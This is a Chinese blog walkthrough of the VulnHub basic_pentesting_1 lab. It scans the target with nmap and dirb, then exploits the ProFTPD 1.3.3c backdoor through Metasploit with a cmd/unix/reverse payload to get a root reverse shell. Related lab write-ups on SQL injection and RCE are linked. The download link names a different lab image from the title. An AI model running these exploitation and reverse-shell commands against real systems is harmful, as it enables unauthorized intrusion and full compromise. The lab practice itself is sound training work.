首页 > 其他分享 >basic_pentesting_1靶场实战[超详细]

basic_pentesting_1靶场实战[超详细]

时间:2024-08-05 19:25:31浏览次数:17  
标签:121.186 ip 端口 192.168 pentesting 地址 设置 basic 靶场

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

一、靶场配置

网卡模式设置为nat

二、主机探测与端口扫描

nmap 192.168.121.0/24

 ip地址为192.168.121.186,开启了21、22、80端口

扫描一下端口信息

nmap  192.168.121.186 -sV -A -p-

 

访问一下80web服务看看

三、get shell

 提示没有添加任何内容

目录扫描看看

dirb http://192.168.121.186

无可用信息,我们想起来之前扫描端口信息的时候,开启的ftp服务版本貌似有漏洞

使用msfconsole查看

msfconsole

search ProFTPD

 使用第五个,1.3.3c

use5

show options

 

 设置RHOSTS为靶机ip地址

set RHOSTS 192.168.121.186

设置payload 

set payload cmd/unix/reverse

再次查看配置信息,发现还需要设置监听地址

 我们设置为kali的ip

 输入run开始攻击

 攻击成功,成功拿到root权限,省了提权这一步

标签:121.186,ip,端口,192.168,pentesting,地址,设置,basic,靶场
From: https://blog.csdn.net/weixin_68615160/article/details/140934009

相关文章

  • DepthB2R靶场实战【超详细】
    下载地址:https://download.vulnhub.com/depth/DepthB2R.ova一、主机探测与端口扫描nmap192.168.121.0/24 发现开启了8080端口我们对该端口进行扫描nmap192.168.121.187-p--A-Pn-sV 访问其8080web服务二、getshell目录扫描dirsearch-uhttp://192.168.121......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • javabasic笔记----分支语句
    分支语句--ifif单分支语句语法:        //....前置代码        if(codition){           //code1        }        //....后续代码如果codition返回true, 就执行code1,继续执行后续代码如果codition返回false,就跳过......
  • 网络靶场搭建教程
    例:搭建网络靶场是一个复杂的过程,涉及到多个步骤和工具。以下提供的教程是主要概述:1. 准备工作:首先需要选择一个操作系统,例如Ubuntu20.464位,并确保系统环境满足搭建靶场的要求。如果没有Docker基础,可以先通过相关视频教程进行学习。2. 安装Docker:使用官方安装脚本自动安......
  • 【Vulnhub系列】Vulnhub Noob 靶场渗透(原创)
    【Vulnhub系列靶场】VulnhubNoob靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、主机发现二、端口扫描有一个go.php的form表单接收文件这里识别21端口存在未授权,55077是ssh的服务端口三、web渗透1、web信息收......
  • [Bugku] web-CTF靶场详解!!!
    平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。          平台有题库、赛事预告、工具库、Writeup库等模块。---------------------------------你必须让他停下:                    ......
  • 【攻防技术系列+SQL注入】mysql靶场
    墨者靶场(SQL手工注入漏洞测试(MySQL数据库))工具dirsearchsqlmappythondirsearch.py-uhttp://<IP>:<端口>/在登录界面,没有账户和密码,也进不去,就在没啥收获的时候,直觉告诉我要打开F12开发者模式,这次信它,就在东点点西点点的时候,我发现了什么。如果遇到扫描漏网之鱼......
  • Vulnhub靶场DC-9练习
    目录0x00准备0x01主机信息收集0x02站点信息收集0x03漏洞查找与利用1.发现SQL注入点2.Sqlmap跑数据3.文件包含4.SSH爆破+端口敲门服务5.提权(写入/etc/passwd)0x04总结0x00准备下载链接:https://download.vulnhub.com/dc/DC-9.zip介绍:Theultimategoal......
  • 反序列化漏洞vulhub靶场serial
    环境搭建下载https://download.vulnhub.com/serial/serial.zip解压出来就是这种 你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。这里就是使用我们刚才下过来的。  漏洞过程详解1.信息收集打开靶机,在kali虚拟机中进行主机......